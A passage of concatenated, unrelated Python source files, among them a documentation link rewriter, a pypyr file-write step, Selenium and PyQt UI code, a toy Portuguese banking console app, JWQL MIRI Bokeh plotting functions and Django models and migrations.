"(/caching.html)":
"(#caching)",
"(/web-analytics.html)":
"(#web-analytics)",
# meta (chapter 7)
"(/what-full-stack-means.html)":
"(#what-full-stack-means)",
"(/about-author.html)":
"(#about-author)",
"(/change-log.html)":
"(" + BASE_FSP + "change-log.html)",
"(/future-directions.html)":
"(" + BASE_FSP + "future-directions.html)",
# code examples
"(/django-code-examples.html)":
"(" + BASE_FSP + "django-code-examples.html)",
"(/sqlalchemy-extensions-plug-ins-related-libraries.html)":
"(" + BASE_FSP + "sqlalchemy-extensions-plug-ins-related-libraries.html)",
"(/email.html)":
"(" + BASE_FSP + "email.html)",
"<a href=\"/full-stack-python-map.pdf\" style=\"border:none\"><img src=\"/img/visuals/full-stack-python-map.png\" width=\"100%\" alt=\"Full Stack Python deployments map.\" class=\"shot\"></a>":
"<img src=\"img/visuals/full-stack-python-map.png\" alt=\"Full Stack Python deployments map.\">",
"(/blog.html)":
"(" + BASE_FSP + "blog.html",
"(/blog/":
"(" + BASE_FSP + "blog/",
}
def transform(output_format='pdf'):
dirs = os.listdir(BASE_DIR)
print(os.listdir(BASE_DIR))
for d in dirs:
if isdir(BASE_DIR + d):
# modify all markdown files in directory
files = os.listdir(BASE_DIR + d)
for f in files:
if not isdir(BASE_DIR + d + '/' + f):
with open(BASE_DIR + d + '/' + f, 'r',
encoding="utf-8") as read_f:
all_lines = read_f.readlines()
with open(BASE_DIR + d + '/' + f, 'w') as write_f:
for l in all_lines:
for k, v in links.items():
l = l.replace(k, v)
if "<div class=\"well see-also\">" in l:
write_f.write("")
else:
write_f.write(l)
print('prepared file ' + str(d) + '/' + str(f))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("o")
args = parser.parse_args()
if args.o == 'pdf':
transform('pdf')
elif args.o == 'epub':
transform('epub')
|
"""pypyr step that writes payload out to a file."""
import logging
from pathlib import Path
from pypyr.config import config
from pypyr.utils.asserts import assert_key_exists, assert_key_is_truthy
logger = logging.getLogger(__name__)
def run_step(context):
"""Write payload to file.
For list of available encodings, see:
https://docs.python.org/3/library/codecs.html#standard-encodings
Args:
context: pypyr.context.Context. Mandatory.
The following context keys expected:
- fileWrite
- path. mandatory. path-like. Write output file to
here. Will create directories in path for you.
- payload. optional. Write this value to output file.
- append. boolean. Default False. Set to True to append to
file if it exists already. If False will overwrite
existing file.
- binary. boolean. Default False. Set to True to write file
content as bytes in binary mode. Set both append & binary
True to append to binary file.
- encoding. string. Defaults None (platform default,
usually 'utf-8').
Returns:
None.
Raises:
pypyr.errors.KeyNotInContextError: fileWrite or
fileWrite['path'] missing in context.
pypyr.errors.KeyInContextHasNoValueError: fileWrite or
fileWrite['path'] exists but is None/Empty.
"""
logger.debug("started")
context.assert_key_has_value('fileWrite', __name__)
file_write = context.get_formatted('fileWrite')
assert_key_is_truthy(obj=file_write,
key='path',
caller=__name__,
parent='fileWrite')
assert_key_exists(obj=file_write,
key='payload',
caller=__name__,
parent='fileWrite')
path = Path(file_write['path'])
is_append = file_write.get('append', False)
is_binary = file_write.get('binary', False)
encoding = file_write.get('encoding', config.default_encoding)
if is_binary:
mode = 'ab' if is_append else 'wb'
payload = file_write['payload']
else:
mode = 'a' if is_append else 'w'
# if payload is str already, str(payload) is payload (same obj id)
payload = str(file_write['payload'])
logger.debug("opening destination file for writing: %s", path)
path.parent.mkdir(parents=True, exist_ok=True)
with open(path, mode, encoding=encoding) as file:
file.write(payload)
logger.info("formatted context & wrote to %s", path)
logger.debug("done")
|
from flask import Flask
def create_app():
app = Flask(__name__, template_folder='../templates', static_folder='../static')
with app.app_context():
from src.dashboard.dashboard import dashboard_bp
app.register_blueprint(dashboard_bp)
return app
|
"""
An action to clear text from an input. An actor must possess the ability
to BrowseTheWeb to perform this action. An actor performs this action like
so:
the_actor.attempts_to(Clear.the_text_from_the(NAME_INPUT))
"""
from selenium.common.exceptions import WebDriverException
from ..actor import Actor
from ..exceptions import DeliveryError
from ..pacing import beat
from ..target import Target
from .base_action import BaseAction
class Clear(BaseAction):
"""
Clears the text from an input field. A Clear action is expected to be
instantiated by its static |Clear.the_text_from| method. A typical
invocation might look like:
Clear.the_text_from(COMMENT_FIELD)
It can then be passed along to the |Actor| to perform the action.
"""
target: Target
@staticmethod
def the_text_from_the(target: Target) -> "Clear":
"""
Creates a new Clear action with the provided text.
Args:
target: the |Target| from which to clear the text.
Returns:
|Clear|
"""
return Clear(target)
@staticmethod
def the_text_from(target: Target) -> "Clear":
"""Syntactic sugar for |Clear.the_text_from_the|."""
return Clear.the_text_from_the(target)
@beat("{0} clears text from the {target}.")
def perform_as(self, the_actor: Actor) -> None:
"""
Asks the actor to performs the Clear action, clearing the text
from the targeted input field using their ability to browse the
web.
Args:
the_actor: The |Actor| who will perform this action.
Raises:
|UnableToPerformError|: the actor does not have the ability to
|BrowseTheWeb|.
"""
element = self.target.found_by(the_actor)
try:
element.clear()
except WebDriverException as e:
msg = (
"Encountered an issue while attempting to clear "
f"{self.target}: {e.__class__.__name__}"
)
raise DeliveryError(msg).with_traceback(e.__traceback__)
def __init__(self, target: Target) -> None:
self.target = target
|
import pymongo
import validate
import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '../'))
import config
import helpers
import datetime
from validate import validate_data
mongo_cursor = pymongo.MongoClient(config.MONGO_URL)
collection = mongo_cursor[config.MONGO_DB_NAME]
def is_visited(link: str):
res = collection[config.COL_LINK_INDEX].find(
{
"domain":helpers.get_domain(link),
"links":{"$in":[link]}
}
)
if res.count() > 0:
return True
else:
return False
def add_link(url,category,page_type):
print(url,category,page_type)
def register_error(link):
print('Register Error',link)
def register_visit(link: str):
print('Register ',link)
domain = helpers.get_domain(link)
collection[config.COL_LINK_INDEX].update_one({"domain":domain},{"$push":{"links":link}},upsert=True)
def fill_data(news_data: dict):
if not news_data.get('date'):
news_data['date'] = str(datetime.datetime.utcnow())
if not news_data.get('domain'):
news_data['domain'] = helpers.get_domain(news_data['url'])
return news_data
def insert_news(news_data: dict):
# print(news_data)
# validate here
if validate_data(news_data):
print('Data Validated')
news_data = fill_data(news_data)
collection[config.COL_NEWS_CONTENT].insert_one(news_data)
else:
print('Invalid Data')
|
#-*- coding: latin1 -*-
import os
import time
class Conta(object):
def __init__(self, numero, saldo):
self.numero = numero
self.saldo = saldo
def getNumero(self):
return self.numero
def getSaldo(self):
return self.saldo
def setNumero(self, numero):
self.numero = numero
def setSaldo(self, saldo):
self.saldo = saldo
def extrato(self):
return self.saldo
def deposito(self, valor):
self.saldo = self.saldo + valor
def saque(self, valor):
if (self.saldo >= valor):
self.saldo = self.saldo - valor
return 1
else:
return 0
#limpar tela
def cls():
os.system('cls' if os.name == 'nt' else 'clear')
cls()
print("*** BANCO NACIONAL ***")
print("--- ABERTURA DE CONTA ---")
num = int(input("Digite o numero da conta: "))
sal = float(input("Digite o saldo inicial: "))
cont = Conta(num, sal)
print("Conta criada com sucesso!")
op=1
while (op!=0):
#limpar tela
cls()
print("*** BANCO NACIONAL ***")
print("-- Menu de opcoes ---")
print("1. Extrato")
print("2. Deposito")
print("3. Saque")
print("0. Sair")
op=int(input("Digite a opcao desejada: "))
if (op==1):
print("Saldo: R$ %.2f" % (cont.extrato()) )
elif (op==2):
dep = float(input("Digite o valor de deposito: "))
cont.deposito(dep)
elif (op==3):
saq = float(input("Digite o valor de saque: "))
if (cont.saque(saq) == 1):
print("Saque realizado com sucesso!")
else:
print("Saldo insuficiente.")
elif (op==0) :
print("Sessao encerrada")
else:
print("Opção inválida!")
#execução de 3 segundos
time.sleep(3)
print("Saldo: R$ %.2f" % (cont.extrato()) )
print("Saldo: R$ %.2f" % (cont.extrato()) )
|
# $Filename$
# $Authors$
# Last Changed: $Date$ $Committer$ $Revision-Id$
#
# Copyright (c) 2003-2011, German Aerospace Center (DLR)
# All rights reserved.
#
#
#Redistribution and use in source and binary forms, with or without
#modification, are permitted provided that the following conditions are
#met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the
# distribution.
#
# * Neither the name of the German Aerospace Center nor the names of
# its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
#LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
#A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
#OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
#SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
#LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
#DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
#THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
#OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Implements the main part of the property widget.
"""
from PyQt4 import QtGui, QtCore
from datafinder.core.configuration.properties import constants
from datafinder.gui.user.common.widget.property.editors.factory import EditorFactory
from datafinder.gui.user.models.properties import PropertiesModel
from datafinder.gui.gen.widgets.property_widget_ui import Ui_propertyWidget
__version__ = "$Revision-Id:$"
class PropertyWidget(QtGui.QWidget, Ui_propertyWidget):
""" Implements the main part of the property widget. """
def __init__(self, parent):
""" @see: L{QWidget<PyQt4.QtGui.QWidget>} """
QtGui.QWidget.__init__(self, parent)
Ui_propertyWidget.__init__(self)
self.setupUi(self)
self._model = None
self.connect(self.addButton, QtCore.SIGNAL("clicked()"), self._addClickedSlot)
self.connect(self.editButton, QtCore.SIGNAL("clicked()"), self._editClickedSlot)
self.connect(self.clearValueButton, QtCore.SIGNAL("clicked()"), self._clearValueClickedSlot)
self.connect(self.deleteButton, QtCore.SIGNAL("clicked()"), self._deleteClickedSlot)
self.connect(self.revertButton, QtCore.SIGNAL("clicked()"), self._revertClickedSlot)
self.connect(self.refreshButton, QtCore.SIGNAL("clicked()"), self._refreshClickedSlot)
def _propertyStateChangedSlot(self):
"""
Handles changes of properties of the model and updates
the button enabled states in accordance to the selection.
"""
self._updateButtonStates()
def _updateSlot(self, index):
"""
Slot is called when data of property entry has changed.
@param index: The index of the selected index.
@type index: L{QModelIndex<PyQt4.QtCore.QModelIndex>}
"""
if index.isValid():
self.propertiesTableView.selectionModel().setCurrentIndex(index, QtGui.QItemSelectionModel.ClearAndSelect)
def _selectionChangedSlot(self, _):
"""
Slot is called when the selected property entries changed.
"""
self._updateButtonStates()
def _updateButtonStates(self):
"""
Updates the enabled state of the add, edit, clear, revert and delete buttons
in accordance to the selected properties.
"""
indexes = self.propertiesTableView.selectionModel().selectedIndexes()
self._setInitialButtonState()
if not self._model.isReadOnly and len(indexes) > 0:
canBeCleared = isDeletable = isRevertable = True
for index in indexes:
if index.isValid():
canBeCleared &= self._model.canBeCleared(index)
isDeletable &= self._model.isDeleteable(index)
isRevertable &= self._model.isRevertable(index)
# Enable / disable buttons
if len(indexes) == 1:
self.editButton.setEnabled(self._model.flags(indexes[0]) & QtCore.Qt.ItemIsEditable)
self.clearValueButton.setEnabled(canBeCleared)
self.deleteButton.setEnabled(isDeletable)
self.revertButton.setEnabled(isRevertable)
self.addButton.setEnabled(True)
def _setInitialButtonState(self):
""" Sets the initial button state. """
self.addButton.setEnabled(not self._model.isReadOnly)
self.editButton.setEnabled(False)
self.clearValueButton.setEnabled(False)
self.deleteButton.setEnabled(False)
self.revertButton.setEnabled(False)
def _addClickedSlot(self):
""" Slot is called when the add button is used. """
index = self._model.add()
self.propertiesTableView.selectionModel().setCurrentIndex(index, QtGui.QItemSelectionModel.ClearAndSelect)
self.addButton.setEnabled(False) # We have to wait until editing is finished to avoid an invalid model
self._editClickedSlot()
def _editClickedSlot(self):
""" Slot is called when the edit button is used. """
index = self.propertiesTableView.selectionModel().currentIndex()
if index.isValid():
self.propertiesTableView.edit(index)
def _clearValueClickedSlot(self):
""" Slot is called when the set empty button is used. """
selectedIndexes = self._determinePropertyRows()
for index in selectedIndexes:
if index.isValid():
self._model.clearValue(index)
def _determinePropertyRows(self):
""" Determines the indexes of the property rows selected by the user. """
selectedIndexes = list()
rows = list() # used to check for / avoid multiple entries
for index in self.propertiesTableView.selectionModel().selectedIndexes():
if not index.row() in rows:
selectedIndexes.append(index)
rows.append(index.row())
selectedIndexes.sort(cmp=lambda x, y: cmp(x.row(), y.row()), reverse=True)
return selectedIndexes
def _deleteClickedSlot(self):
""" Slot is called when the delete button is used. """
selectedIndexes = self._determinePropertyRows()
for index in selectedIndexes:
if index.isValid():
self._model.remove(index)
def _revertClickedSlot(self):
""" Slot is called when the revert button is used. """
selectedIndexes = self._determinePropertyRows()
for index in selectedIndexes:
if index.isValid():
self._model.revert(index)
def _refreshClickedSlot(self):
""" Slot is called when the refresh button is used. """
if self._model.dirty:
button = QtGui.QMessageBox.information(self, self.tr("Refresh information"),
self.tr("All changes will be lost after the update.\n Do you want to continue?"),
QtGui.QMessageBox.Yes|QtGui.QMessageBox.No,
QtGui.QMessageBox.Yes)
if button == QtGui.QMessageBox.No:
return
self._model.refresh()
self.propertiesTableView.setSortingEnabled(True)
def _setModel(self, model):
"""
Sets the model.
@param model: Model representing a set of properties.
@type model: L{PropertiesModel<datafinder.gui.user.models.properties.PropertiesModel>}
"""
self._model = model
self.propertiesTableView.setModel(model)
self._setInitialButtonState()
column, order = self._model.sortProperties
self.propertiesTableView.horizontalHeader().setSortIndicator(column, order)
self.propertiesTableView.setSortingEnabled(True)
propertyTypeNames = [constants.STRING_TYPE, constants.DATETIME_TYPE,
constants.NUMBER_TYPE, constants.BOOLEAN_TYPE, constants.LIST_TYPE]
self.propertiesTableView.setItemDelegate(_PropertyItemDelegate(propertyTypeNames, model, self))
self.connect(self._model, QtCore.SIGNAL("dataChanged(QModelIndex, QModelIndex)"), self._updateSlot)
self.connect(self.propertiesTableView.selectionModel(),
QtCore.SIGNAL("selectionChanged(QItemSelection, QItemSelection)"),
self._selectionChangedSlot)
self.connect(self._model, QtCore.SIGNAL(PropertiesModel.PROPERTY_STATE_CHANGED_SIGNAL),
self._propertyStateChangedSlot)
def _getModel(self):
""" Getter of the property model. """
return self._model
def activateRefreshButton(self):
""" Activates the refresh button. """
self.refreshButton.show()
def deactivateRefreshButton(self):
""" De-activates the refresh button. """
self.refreshButton.hide()
model = property(_getModel, _setModel)
class _PropertyItemDelegate(QtGui.QStyledItemDelegate):
"""
This item delegate has to choose the right editor for the expected property type
and has to handle the conversion of the editor input to a proper model format.
"""
def __init__(self, propertyTypes, model, parent=None):
"""
Constructor.
@param propertyTypes: Property types available for this property
@type propertyTypes: C{list} of C{unicode}
@param parent: Parent object of the delegate.
@type parent: L{QWidget<PyQt4.QtGui.QWidget>}
"""
QtGui.QStyledItemDelegate.__init__(self, parent)
self._factory = EditorFactory()
self._propertyTypes = propertyTypes
self.connect(self, QtCore.SIGNAL("closeEditor(QWidget *, QAbstractItemDelegate::EndEditHint)"), self._handleEditorClosedSlot )
self._currentEditedRow = -1
self._currentEditedColumn = -1
self._model = model
def _handleEditorClosedSlot(self, _, hint):
""" Handles the closing of editor to remove added property entries without property name. """
if hint == QtGui.QAbstractItemDelegate.RevertModelCache \
and self._currentEditedColumn == 0:
index = self._model.index(self._currentEditedRow, self._currentEditedColumn)
index.model().setData(index, QtCore.QVariant(None))
def createEditor(self, parent, _, index):
""" @see: L{createEditor<PyQt4.QtGui.QItemDelegate.createEditor>} """
self._currentEditedRow = index.row()
self._currentEditedColumn = index.column()
if index.column() == 0:
editor = QtGui.QLineEdit(parent)
editor.setValidator(_PropertyNameValidator(index.model().propertyNameValidationFunction, editor))
elif index.column() == 1:
editor = QtGui.QComboBox(parent)
editor.addItems(self._propertyTypes)
valueType = index.model().getModelData(index.row(), 1)
if valueType in self._propertyTypes:
editor.setCurrentIndex(self._propertyTypes.index(valueType))
elif index.column() == 2:
propType = index.model().getModelData(index.row(), 1)
restriction = index.model().getModelData(index.row(), 4)
pyValue = index.model().getModelData(index.row(), 2)
editor = self._factory.createEditor(parent, propType, restriction, pyValue)
return editor
def setModelData(self, editor, model, index):
""" @see: L{setModelData<PyQt4.QtGui.QItemDelegate.setModelData>} """
value = self._factory.getValueFromEditor(editor)
if type(value) == list:
variantList = list()
for item in value:
variantList.append(QtCore.QVariant(item))
variant = QtCore.QVariant.fromList(variantList)
else:
variant = QtCore.QVariant(value)
model.setData(index, variant)
def setEditorData(self, editor, index):
""" L{setEditorData<PyQt4.QtGui.QItemDelegate.setEditorData>} """
pyData = index.model().getModelData(index.row(), index.column())
self._factory.setEditorValue(editor, pyData)
class _PropertyNameValidator(QtGui.QValidator):
""" Custom validator for property name checking. """
def __init__(self, validationFunction, parent=None):
"""
Constructor.
@param validationFunction: Callable function which gets the property name as input and validates it.
@type validationFunction: Callable C{object}
"""
QtGui.QValidator.__init__(self, parent)
self._validationFunction = validationFunction
def validate(self, inputString, position):
""" Overwrites the default implementation. """
result = QtGui.QValidator.Invalid
if self._validationFunction(unicode(inputString)) or len(inputString) == 0:
result = QtGui.QValidator.Acceptable
return (result, position)
|
import argparse
from eurlex2lexparency.celex_manager.eurlex import PreLegalContentXmlDataBase
parser = argparse.ArgumentParser(
description="Queries the Eurlex database for document IDs and stores metadata to a preliminary database"
)
parser.add_argument('--consyear', help='Focus on consolidated versions published at given year.')
parser.add_argument('--consleg', help='Include Celexes for consolidated Versions.', action="store_true")
parser.add_argument('--pre', help='First digit of the celex ID.')
parser.add_argument('--year', help="Specify year of the documents to be queried.")
parser.add_argument('--inter', help='Interfix of the celex ID, specifying the document type.')
parser.add_argument('--number', help='Number of the document.')
parser.add_argument('--resume', help="Resume from previous queries", action="store_true")
args = parser.parse_args()
plcxdb = PreLegalContentXmlDataBase()
if args.consyear is not None:
plcxdb.get_conslegs_from(args.consyear, resume=args.resume)
else:
kwargs = {key: value for key, value in args.__dict__.items() if value is not None}
plcxdb.get_celexes_where(**kwargs)
|
# Wallbox EV module __init__.py
from wallbox.wallbox import Wallbox
from wallbox.statuses import Statuses
|
from django.conf import settings
from django.db import models
from django.db.models import DO_NOTHING
class AuthorizedAgent(models.Model):
authorized = models.BooleanField(default=True)
user = models.OneToOneField(
settings.AUTH_USER_MODEL,
default=None,
blank=True,
null=True,
on_delete=DO_NOTHING,
)
app_name = models.CharField(max_length=200, blank=True, null=True)
app_key = models.TextField(blank=True, null=True)
|
#! /usr/bin/env python
"""Prepares plots for FPE VOLTAGE tab
Module prepares plots for mnemonics below. Combines plots in a grid and
returns tab object.
Plot 1:
IMIR_HK_FW_POS_RATIO_FND
IMIR_HK_FW_POS_RATIO_OPAQUE
IMIR_HK_FW_POS_RATIO_F1000W
IMIR_HK_FW_POS_RATIO_F1130W
IMIR_HK_FW_POS_RATIO_F1280W
IMIR_HK_FW_POS_RATIO_P750L
IMIR_HK_FW_POS_RATIO_F1500W
IMIR_HK_FW_POS_RATIO_F1800W
IMIR_HK_FW_POS_RATIO_F2100W
IMIR_HK_FW_POS_RATIO_F560W
IMIR_HK_FW_POS_RATIO_FLENS
IMIR_HK_FW_POS_RATIO_F2300C
IMIR_HK_FW_POS_RATIO_F770W
IMIR_HK_FW_POS_RATIO_F1550C
IMIR_HK_FW_POS_RATIO_F2550W
IMIR_HK_FW_POS_RATIO_F1140C
IMIR_HK_FW_POS_RATIO_F2550WR
IMIR_HK_FW_POS_RATIO_F1065C
Plot 2:
IMIR_HK_GW14_POS_RATIO_SHORT
IMIR_HK_GW14_POS_RATIO_MEDIUM
IMIR_HK_GW14_POS_RATIO_LONG
Plot 3:
IMIR_HK_GW23_POS_RATIO_SHORT
IMIR_HK_GW23_POS_RATIO_MEDIUM
IMIR_HK_GW23_POS_RATIO_LONG
Plot 4:
IMIR_HK_CCC_POS_RATIO_LOCKED
IMIR_HK_CCC_POS_RATIO_OPEN
IMIR_HK_CCC_POS_RATIO_CLOSED
Authors
-------
- Daniel Kühbacher
Use
---
The functions within this module are intended to be imported and
used by ``dashboard.py``, e.g.:
::
from .plots.wheel_ratio_tab import wheel_plots
tab = wheel_plots(conn, start, end)
Dependencies
------------
User must provide database "miri_database.db"
"""
import jwql.instrument_monitors.miri_monitors.data_trending.plots.plot_functions as pf
import jwql.instrument_monitors.miri_monitors.data_trending.utils.mnemonics as mn
from bokeh.plotting import figure
from bokeh.models.widgets import Panel, Div
from bokeh.layouts import column
def gw14(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure(tools="pan,wheel_zoom,box_zoom,reset,save",
toolbar_location="above",
plot_width=1120,
plot_height=500,
y_range=[-2, 2],
x_axis_type='datetime',
output_backend="webgl",
x_axis_label='Date',
y_axis_label='ratio (normalized)')
p.grid.visible = True
p.title.text = "DGA-A Ratio"
p.title.align = "left"
pf.add_basic_layout(p)
pf.add_to_wplot(p, "SHORT", "IMIR_HK_GW14_POS_RATIO_SHORT", start, end, conn, mn.gw14_nominals['SHORT'], color="green")
pf.add_to_wplot(p, "MEDIUM", "IMIR_HK_GW14_POS_RATIO_MEDIUM", start, end, conn, mn.gw14_nominals['MEDIUM'], color="red")
pf.add_to_wplot(p, "LONG", "IMIR_HK_GW14_POS_RATIO_LONG", start, end, conn, mn.gw14_nominals['LONG'], color="blue")
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def gw23(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure(tools="pan,wheel_zoom,box_zoom,reset,save",
toolbar_location="above",
plot_width=1120,
plot_height=500,
y_range=[-2, 2],
x_axis_type='datetime',
x_axis_label='Date',
y_axis_label='ratio (normalized)')
p.grid.visible = True
p.title.text = "DGA-B Ratio"
p.title.align = "left"
pf.add_basic_layout(p)
pf.add_to_wplot(p, "SHORT", "IMIR_HK_GW23_POS_RATIO_SHORT", start, end, conn, mn.gw23_nominals['SHORT'], color="green")
pf.add_to_wplot(p, "MEDIUM", "IMIR_HK_GW23_POS_RATIO_MEDIUM", start, end, conn, mn.gw23_nominals['MEDIUM'], color="red")
pf.add_to_wplot(p, "LONG", "IMIR_HK_GW23_POS_RATIO_LONG", start, end, conn, mn.gw23_nominals['LONG'], color="blue")
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def ccc(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure(tools="pan,wheel_zoom,box_zoom,reset,save",
toolbar_location="above",
plot_width=1120,
plot_height=500,
y_range=[-2, 2],
x_axis_type='datetime',
x_axis_label='Date',
y_axis_label='ratio (normalized)')
p.grid.visible = True
p.title.text = "CCC Ratio"
pf.add_basic_layout(p)
# add_to_wplot(p, "LOCKED", "IMIR_HK_CCC_POS_RATIO_LOCKED", start, end, conn, mn.ccc_nominals['LOCKED'], color="green")
pf.add_to_wplot(p, "OPEN", "IMIR_HK_CCC_POS_RATIO_OPEN", start, end, conn, mn.ccc_nominals['OPEN'], color="red")
pf.add_to_wplot(p, "CLOSED", "IMIR_HK_CCC_POS_RATIO_CLOSED", start, end, conn, mn.ccc_nominals['CLOSED'], color="blue")
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def fw(conn, start, end):
'''Create specific plot and return plot object
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : Plot object
Bokeh plot
'''
# create a new plot with a title and axis labels
p = figure(tools="pan,wheel_zoom,box_zoom,reset,save",
toolbar_location="above",
plot_width=1120,
plot_height=500,
y_range=[-6, 4],
x_axis_type='datetime',
x_axis_label='Date',
y_axis_label='ratio (normalized)')
p.grid.visible = True
p.title.text = "Filterwheel Ratio"
pf.add_basic_layout(p)
pf.add_to_wplot(p, "FND", "IMIR_HK_FW_POS_RATIO_FND", start, end, conn, mn.fw_nominals['FND'], color="green")
pf.add_to_wplot(p, "OPAQUE", "IMIR_HK_FW_POS_RATIO_OPAQUE", start, end, conn, mn.fw_nominals['OPAQUE'], color="red")
pf.add_to_wplot(p, "F1000W", "IMIR_HK_FW_POS_RATIO_F1000W", start, end, conn, mn.fw_nominals['F1000W'], color="blue")
pf.add_to_wplot(p, "F1130W", "IMIR_HK_FW_POS_RATIO_F1130W", start, end, conn, mn.fw_nominals['F1130W'], color="orange")
pf.add_to_wplot(p, "F1280W", "IMIR_HK_FW_POS_RATIO_F1280W", start, end, conn, mn.fw_nominals['F1280W'], color="firebrick")
pf.add_to_wplot(p, "P750L", "IMIR_HK_FW_POS_RATIO_P750L", start, end, conn, mn.fw_nominals['P750L'], color="cyan")
pf.add_to_wplot(p, "F1500W", "IMIR_HK_FW_POS_RATIO_F1500W", start, end, conn, mn.fw_nominals['F1500W'], color="magenta")
pf.add_to_wplot(p, "F1800W", "IMIR_HK_FW_POS_RATIO_F1800W", start, end, conn, mn.fw_nominals['F1800W'], color="burlywood")
pf.add_to_wplot(p, "F2100W", "IMIR_HK_FW_POS_RATIO_F2100W", start, end, conn, mn.fw_nominals['F2100W'], color="cadetblue")
pf.add_to_wplot(p, "F560W", "IMIR_HK_FW_POS_RATIO_F560W", start, end, conn, mn.fw_nominals['F560W'], color="chartreuse")
pf.add_to_wplot(p, "FLENS", "IMIR_HK_FW_POS_RATIO_FLENS", start, end, conn, mn.fw_nominals['FLENS'], color="brown")
pf.add_to_wplot(p, "F2300C", "IMIR_HK_FW_POS_RATIO_F2300C", start, end, conn, mn.fw_nominals['F2300C'], color="chocolate")
pf.add_to_wplot(p, "F770W", "IMIR_HK_FW_POS_RATIO_F770W", start, end, conn, mn.fw_nominals['F770W'], color="darkorange")
pf.add_to_wplot(p, "F1550C", "IMIR_HK_FW_POS_RATIO_F1550C", start, end, conn, mn.fw_nominals['F1550C'], color="darkgreen")
pf.add_to_wplot(p, "F2550W", "IMIR_HK_FW_POS_RATIO_F2550W", start, end, conn, mn.fw_nominals['F2550W'], color="darkcyan")
pf.add_to_wplot(p, "F1140C", "IMIR_HK_FW_POS_RATIO_F1140C", start, end, conn, mn.fw_nominals['F1140C'], color="darkmagenta")
pf.add_to_wplot(p, "F2550WR", "IMIR_HK_FW_POS_RATIO_F2550WR", start, end, conn, mn.fw_nominals['F2550WR'], color="crimson")
pf.add_to_wplot(p, "F1065C", "IMIR_HK_FW_POS_RATIO_F1065C", start, end, conn, mn.fw_nominals['F1065C'], color="cornflowerblue")
p.legend.location = "bottom_right"
p.legend.click_policy = "hide"
return p
def wheel_ratios(conn, start, end):
'''Combine plots to a tab
Parameters
----------
conn : DBobject
Connection object that represents database
start : time
Startlimit for x-axis and query (typ. datetime.now()- 4Months)
end : time
Endlimit for x-axis and query (typ. datetime.now())
Return
------
p : tab object
used by dashboard.py to set up dashboard
'''
descr = Div(text=
"""
<style>
table, th, td {
border: 1px solid black;
background-color: #efefef;
border-collapse: collapse;
padding: 5px
}
</style>
<body>
<table style="width:100%">
<tr>
<th><h6>Plotname</h6></th>
<th><h6>Mnemonic</h6></th>
<th><h6>Description</h6></th>
</tr>
<tr>
<td>Filterwheel Ratio</td>
<td>IMIR_HK_FW_POS_RATIO<br>
IMIR_HK_FW_CUR_POS<br></td>
<td>FW position sensor ratio (normalised) and commanded position</td>
</tr>
<tr>
<td>DGA-A Ratio</td>
<td>IMIR_HK_GW14_POS_RATIO<br>
IMIR_HK_GW14_CUR_POS<br></td>
<td>DGA-A position sensor ratio (normalised) and commanded position</td>
</tr>
<tr>
<td>DGA-B Ratio</td>
<td>IMIR_HK_GW23_POS_RATIO<br>
IMIR_HK_GW23_CUR_POS<br></td>
<td>DGA-B position sensor ratio (normalised) and commanded position</td>
</tr>
<tr>
<td>CCC Ratio</td>
<td>IMIR_HK_CCC_POS_RATIO<br>
IMIR_HK_CCC_CUR_POS<br></td>
<td>Contamination Control Cover position sensor ratio (normalised) and commanded position</td>
</tr>
</table>
</body>
""", width=1100)
plot1 = fw(conn, start, end)
plot2 = gw14(conn, start, end)
plot3 = gw23(conn, start, end)
plot4 = ccc(conn, start, end)
layout = column(descr, plot1, plot2, plot3, plot4)
tab = Panel(child=layout, title="WHEEL RATIO")
return tab
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
def forward(apps, schema_editor):
Sponsor = apps.get_model('sponsorship', 'Sponsor')
db_alias = schema_editor.connection.alias
for sponsor in Sponsor.objects.using(db_alias):
# Get web description and set on sponsor
description = sponsor.sponsor_benefits.filter(benefit__name='Company Description').first()
if description:
sponsor.web_description = description.text
logo = sponsor.sponsor_benefits.filter(benefit__name='Web logo').first()
if logo:
sponsor.web_logo = logo.upload
sponsor.save()
def back(apps, schema_editor):
